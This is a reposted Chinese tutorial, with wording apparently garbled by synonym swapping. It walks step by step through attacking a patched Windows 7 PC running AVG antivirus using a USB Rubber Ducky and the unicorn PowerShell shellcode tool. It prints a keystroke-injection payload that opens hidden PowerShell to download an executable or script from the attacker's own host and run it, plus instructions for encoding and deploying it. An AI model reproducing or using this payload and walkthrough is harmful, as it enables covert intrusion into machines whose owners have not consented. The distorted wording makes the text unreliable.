使用橡皮鸭硬件绕过杀软,渗透Win 7 8090安适门户
使用橡皮鸭硬件绕过杀软,渗透Win 7
本文将演示如何使用USB Rubber Ducky和unicorn打击一台运行AVG2015杀毒软件并且补丁全部打上的Windows 7电脑。本教程仅供学习,请勿用作犯警用途。
<img src="/uploads/allimg/191120/1Q035A15_0.jpg!small" alt="duck_thumb_fa2571a3-a36f-460a-b68b-d29d74d87b2f_1024x1024.jpg"></b></span></p>
筹备进行尝试所要做的筹备:
Windows 7 (受害者主机)
Kali Linux 2.0 (打击者主机)
USB Rubber Ducky 硬件
注意:Windows 7 和 Kali系统可以是虚拟运行的也可以是实体运行的,但是我们建议在专门的实体硬件上运行Windows7以防备USBRubber Ducky模拟键盘HID的时候虚拟化技术将动态变动USB分配。
获得payload1. 从Hakshop 采办USB Rubber Ducky Deluxe
<img src="/uploads/allimg/191120/1Q03K194_0.png!small" alt="BLOG-WIN7-screenshot.png"></p>2. 访谒 USB Rubber Ducky的Wiki 使用此中的模板payload
<img src="http://image.3001.net/images/20160529/14644959387891.png!small" alt="2.png"></p>3. 复制 “Payload – Powershell Wget + Execute” GUI r DELAY 100STRING powershell -windowstyle hidden (new-objectSystem.Net.WebClient).DownloadFile(‘’,’%TEMP%\bob.exe’);Start-Process “%TEMP%\bob.exe”
<img src="/uploads/allimg/191120/1Q0394649_0.png!small" alt="3.png"></p>4. 将默认的URL“”改成你本身的域名或IP地点。我的设定是:GUIr DELAY 100 STRING powershell -windowstyle hidden (new-objectSystem.Net.WebClient).DownloadFile(‘’,’%TEMP%\drop.cmd’);Start-Process “%TEMP%\drop.cmd” ,然后按回车
5. 把你改削过的代码粘贴到在线DuckToolkit编码器中,选择键盘样式,然后点击生成脚本。
<img src="/uploads/allimg/191120/1Q0401240_0.png!small" alt="5.png"></p>6. 下载“inject.bin” 和 “inject.txt” 文件。把“inject.bin” 复制到Rubber Ducky中的SD卡中,“inject.txt” 供参考之用
<img src="/uploads/allimg/191120/1Q0421091_0.png!small" alt="6.png"></p>7.把micro SD卡插入micro SD USB适配器(不是RubbyDucky),然后插入Kali电脑。
8.将“inject.bin”文件从你的下载文件夹复制到Micro SD卡根目录
<img src="/uploads/allimg/191120/1Q0434H1_0.png!small" alt="8.png"></p>9.接下来我们用unicorn生成payload。从GitHub下载unicorn.py。Unicorn是一款使用PowerShell降级打击的简单工具,它会把shellcode直接注入到内存中。这个项目给以MatthewGraeber的Powershell打击和DavidKennedy (TrustedSec) 和Josh Kelly在Defcon 18上展示的powershell绕过技巧。
<img src="/uploads/allimg/191120/1Q04461Q_0.png!small" alt="9.png"></p>10.在浏览器菜单点击“文件”-“生存为”选项,将页面生存到你的文件系统,我把它放在了桌面上的一个叫USB_RD的文件夹里。
温馨提示: 本文由杰米博客推荐,转载请保留链接: https://www.jmwww.net/file/pc/12617.html